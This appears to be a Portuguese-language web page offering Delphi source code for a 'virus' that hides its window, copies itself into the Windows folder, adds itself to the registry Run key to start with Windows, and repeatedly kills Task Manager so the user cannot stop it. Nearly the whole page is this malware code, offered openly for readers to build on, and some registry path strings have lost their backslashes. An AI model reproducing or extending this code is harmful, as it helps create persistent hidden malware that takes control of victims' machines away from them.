Buscar por:

virus que reinicia com o windows

Código

virus em delphi

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );

var

sKey : string;

reg : TRegIniFile;

begin

if( bRunOnce )then

begin

sKey := 'Once'

end

else

begin

sKey := '';

end;

reg := TRegIniFile.Create( '' );

reg.RootKey := HKEY_LOCAL_MACHINE;

reg.WriteString('SoftwareMicrosoft' + 'WindowsCurrentVersionRun'+ sKey + #0, sProgTitle, sCmdLine );

reg.Free;

end;

Agora no FormCreate coloque isso:

procedure TForm1.FormCreate(Sender: TObject);

begin

Application.ShowMainForm := False;

CopyFile(PChar(Application.ExeName),'C:WINDOWSvirus.exe',True);

RunOnStartup('virus','C:WINDOWSvirus.exe',true);

end;

Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte:

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, TLHelp32, PsAPI, ExtCtrls;

type

TForm1 = class(TForm)

Timer1: TTimer;

procedure Timer1Timer(Sender: TObject);

procedure FormCreate(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

function TerminarProcesso(sFile: String): Boolean;

var

verSystem: TOSVersionInfo;

hdlSnap,hdlProcess: THandle;

bPath,bLoop: Bool;

peEntry: TProcessEntry32;

arrPid: Array [0..1023] of DWORD;

iC: DWord;

k,iCount: Integer;

arrModul: Array [0..299] of Char;

hdlModul: HMODULE;

begin

Result := False;

if ExtractFileName(sFile)=sFile then

bPath:=false

else

bPath:=true;

verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);

GetVersionEx(verSystem);

if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then

begin

hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

peEntry.dwSize:=Sizeof(peEntry);

bLoop:=Process32First(hdlSnap,peEntry);

while integer(bLoop)<>0 do

begin

if bPath then

begin

if CompareText(peEntry.szExeFile,sFile) = 0 then

begin

TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);

Result := True;

end;

end

else

begin

if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then

begin

TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);

Result := True;

end;

end;

bLoop := Process32Next(hdlSnap,peEntry);

end;

CloseHandle(hdlSnap);

end

else

if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then

begin

EnumProcesses(@arrPid,SizeOf(arrPid),iC);

iCount := iC div SizeOf(DWORD);

for k := 0 to Pred(iCount) do

begin

hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]);

if (hdlProcess<>0) then

begin

EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC);

GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul));

if bPath then

begin

if CompareText(arrModul,sFile) = 0 then

begin

TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);

Result := True;

end;

end

else

begin

if CompareText(ExtractFileName(arrModul),sFile) = 0 then

begin

TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);

Result := True;

end;

end;

CloseHandle(hdlProcess);

end;

end;

end;

end;

procedure TForm1.Timer1Timer(Sender: TObject);

begin

TerminarProcesso('taskmgr.exe');

end;

procedure TForm1.FormCreate(Sender: TObject);

begin

application.ShowMainForm := false;

end;

end.